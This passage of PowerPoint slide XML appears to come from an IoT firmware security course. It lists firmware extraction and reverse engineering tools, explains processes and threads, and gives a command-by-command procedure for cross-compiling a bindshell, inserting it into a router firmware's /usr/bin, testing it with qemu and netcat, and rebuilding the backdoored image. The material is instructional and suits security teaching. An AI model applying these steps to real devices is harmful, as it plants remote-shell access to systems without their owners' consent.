              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CVE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Part/web information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164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328767753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Firmware modification kit tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1847766"/>
            <a:ext cx="11582400" cy="3652491"/>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./extract-firmware.sh Firmware extraction script build-firmware.sh Firmware re-building script</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./build-firmware.sh [-nopad] [-min]</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Binwalk Scans firmware images for known file types (firmware headers, compressed kernels, file systems, etc.</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CramFSCK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: CRAMFS file system image checker and extractor. </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CramFSSwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Utility to swap the endianess of a CramFS image</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CRCalc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Utility to patch all uImage and TRX headers inside a given firmware image.</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MkSquashFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Builds a squashfs file system image. </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MkCramFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Builds a cramfs file system image. Coming in next version. </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165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35798678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Firmware modification kit tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1598530"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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MotorolaBin Utility: prepends 8 byte headers to TRX images for Motorola devices WR850G, WA840G, WE800G. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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Splitter3 Utility: Scans and extracts a firmware image's component parts.</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Tpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-tool Utility: manipulates TP-Link vendor format images.</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UnCramFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Alternate tool to extract a cramfs file system image.</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UnCramFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-LZMA: Alternate tool to extract LZMA-compressed cramfs file system images, such as those used by OpenRG.</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UnSquashFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Extracts a zlib squashfs file system image. Current versions included are 1.0 for 3.0 images and 1.0 for 2.x images (my own blend).</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UnSquashFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-LZMA: Extracts an lzma squashfs file system image. </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UnTRX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Splits TRX style firmwares into their component parts. </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WebDecomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Extracts and restores Web GUI files from DD-WRT firmware images, allowing modifications to the Web pages.</a:t>
            </a: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166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264752844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4"/>
            <a:ext cx="11582400" cy="1006894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simulating and reverse engineering software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2224215"/>
            <a:ext cx="11582400" cy="3987537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Qeumu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IDA pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>nm</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167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13088150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133150"/>
            <a:ext cx="9158748" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reverse engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474017" y="1476962"/>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Goals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Find/insert backdoors (by bypassing authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>API keys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Private keys and trust infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Configuration files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URLs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Open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Simple tools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Readelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strings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Entropy locators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Others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Firmdyne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Radare2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>http/bit.ly/FirmwareAnalysisTools</a:t>
            </a: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168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5517658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Firmware mod kit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1692911"/>
            <a:ext cx="10692714"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Python based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Not actively maintained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Firmware-mod-kit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Updating the VM will break FMK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Extracts firmware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Modify firmware contents and files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Add compiled binaries to firmware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Rebuild firmware </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1321556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Processes and threads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194411" y="1355176"/>
            <a:ext cx="11593933" cy="5139233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Each user program is managed by the OS as a single process with multiple threads.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The process abstraction provides a memory region for a user program as well as interfaces that allow the program to use kernel services.  Each process has a unique process id (pid) which is usually just a number.  Examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Start another process that runs the program in file /Applications/exel.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Create a file with the name /home/jlm//friends.txt. Read from/write to some existing file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Send a message (data) or signal to another process (“pipes” and “channels”).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“Kill” some process or end my execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Allocate more memory for me.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Each process has one or more associated threads.  Threads are units of potentially concurrent execution.  For example, you might have a process that uses one thread for computation and another for routine data collection.  Each thread is scheduled by the kernel and scheduling is a critical kernel function.  If a computer has multiple processors, different threads of the same or different programs can run on those processors  simultaneously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Each process is associated with an authenticated user account.  Usually, you authenticate yourself by “logging in” with a user-name and password, thereafter, all programs you start are associated with your “account.”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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42845143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Develop a backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990558" y="1692911"/>
            <a:ext cx="10210884" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Extract firmware with FMK  (extract-firmware.sh)</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Identify the target FW architecture and endiness (readelf –h binary)</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Build a cross compiler with Buildroot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Use cross compiler to build the backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Copy the backdoor to extracted FW /usr/bin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Copy appropriate qemu binary to extracted FW rootfs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Emulate the backdoor using chroot and qemu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Connect to backdoor via netcat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Remove qemu binary from extracted FW rootfs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Build firmware with FMK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Test backdoored firmware with FAT and netcat </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EFA5D4-C3D0-B549-946E-86AF87BB7D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2520779" y="6076431"/>
            <a:ext cx="5140410"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Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aaron Guzman, IoT Firmware Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>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444210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Building backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107905" y="1875473"/>
            <a:ext cx="1053216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Use buildroot configured to the architecture to cross-compile the bindshell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wget https://buildroot.org/downloads/buildroot-2018.02.1.tar.gz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tar xzvf buildroot-2018.02.1.tar.gz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make menuconfig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Select the architecture, save, and exit buildroot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Enter “make” to build... Wait</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171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275488085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Building backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403570" y="1515085"/>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Example</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cd buildroot-2018.02.1/output/host/usr/bin/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./mips-buildroot-linux-uclibc-gcc bindshell.c -static -o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backdoor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sudo chmod +x backdoor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Copy the bindshell over to extracted filesystem usr/bin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sudo cp bindshell /home/iotos/tools/firmware-mod-kit/DIR300B5_FW2 12WWB02/rootfs/usr/bin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Cp over the qemu MIPS binary</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sudo cp /usr/bin/qemu-mipsel-static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sudo chroot . ./qemu-mipsel-static bindshell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Open up another terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and connect to the bindshell on port 9999 - nc -nv 127.0.0.1 9999 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339353742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Building backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
